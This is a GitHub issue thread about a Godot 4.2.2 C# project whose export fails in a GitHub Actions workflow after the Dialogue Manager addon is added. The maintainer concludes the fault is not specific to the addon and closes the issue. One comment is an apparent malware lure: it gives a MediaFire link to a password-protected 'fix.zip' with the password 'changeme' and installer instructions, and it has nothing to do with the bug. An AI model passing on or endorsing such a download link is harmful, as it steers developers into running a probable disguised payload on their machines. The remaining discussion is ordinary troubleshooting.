### ISSUE TITLE
Godot 4.2.2 (mono version) export fail in GitHub Workflow when Dialogue Manager is included

### ISSUE THREAD

**Issue by davidwesst** [nathanhoad/godot_dialogue_manager#661]
**Describe the bug**
When I export my project locally, everything works as intended, but when running a continuous integration (CI) workflow with GitHub Workflows, it is unable to the build (or export) the solution.

**Affected version**

- Dialogue Manager version: 2.41.4
- Godot version: 4.2.2-mono (C# version)

**To Reproduce**

1. Create a new C# project in Godot
2. Setup a GitHub Workflow that uses Godot export ([example workflow file](https://github.com/davidwesst/godot-examples/blob/dialogue-manager-build-error/.github/workflows/export.yml))
3. Confirm the export works as expected
4. Add the Dialogue Manager addon from the AssetLib in the Godot editor
5. Push changes and activate the GH Workflow
6. *Workflow will fail*

**Expected behavior**
I expected the workflow to complete, specifically I expected the export to work.

**Screenshots**
- I setup a branch in an example repository to replicate the behaviour. [EXAMPLE REPO](https://github.com/davidwesst/godot-examples/tree/dialogue-manager-build-error). 
- You can see one of the failures [here](https://github.com/davidwesst/godot-examples/actions/runs/10533399405/job/29192831860#step:6:28)

**What I tried**
You should be able to see this in the workflow history, along with the logs for each thing-- but I tried it on both `windows-latest` and `ubuntu-latest`, which results in the same issue. Looking through the issue history on your repo, I'm wondering if it is related to something along [this issue](https://github.com/nathanhoad/godot_dialogue_manager/issues/566).

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by davidwesst** [comment]
Thought I would add a short update-- although my sample project demonstrates the issue, my main project still has the issue even though I removed the add-on. Might be a sign that the issue is more with .NET related solutions and the export process in GH workflow, rather than this add-on specifically.

**Comment by nathanhoad** [comment]
From what I can tell so far it looks like Godot doesn't seem to know what some autoloads are before parsing scripts (even though they are enabled at the time). I think you're right - this doesn't appear to be specific to Dialogue Manager so I'll close the issue until there is more information.
